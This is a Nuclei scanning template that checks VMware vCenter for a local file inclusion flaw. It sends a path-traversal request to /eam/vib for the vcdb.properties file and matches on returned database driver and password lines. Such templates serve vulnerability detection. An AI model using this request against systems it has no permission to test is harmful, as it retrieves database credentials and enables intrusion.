id: vmware-vcenter-lfi

info:
  name: VMware vCenter - Local File Inclusion
  author: dwisiswant0
  severity: high
  description: VMware vCenter is vulnerable to local file inclusion.
  reference:
    - https://kb.vmware.com/s/article/7960893
    - https://twitter.com/ptswarm/status/1316016337550938122
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 3
  tags: vmware,lfi,vcenter

http:
  - raw:
      - |
        GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
        - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
        - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="

      - type: status
        status:
          - 200

# digest: 490a0046304402205108988bc53b9f592fc09fd56aec279ff6b18c00dafdac8b6148e76186c6dd0d02202f5fe07587e04ca37f9029c4355ee5ae438f459f44dae1a6adf18c84acf5ec3c:922c64590222798bb761d5b6d8e72950
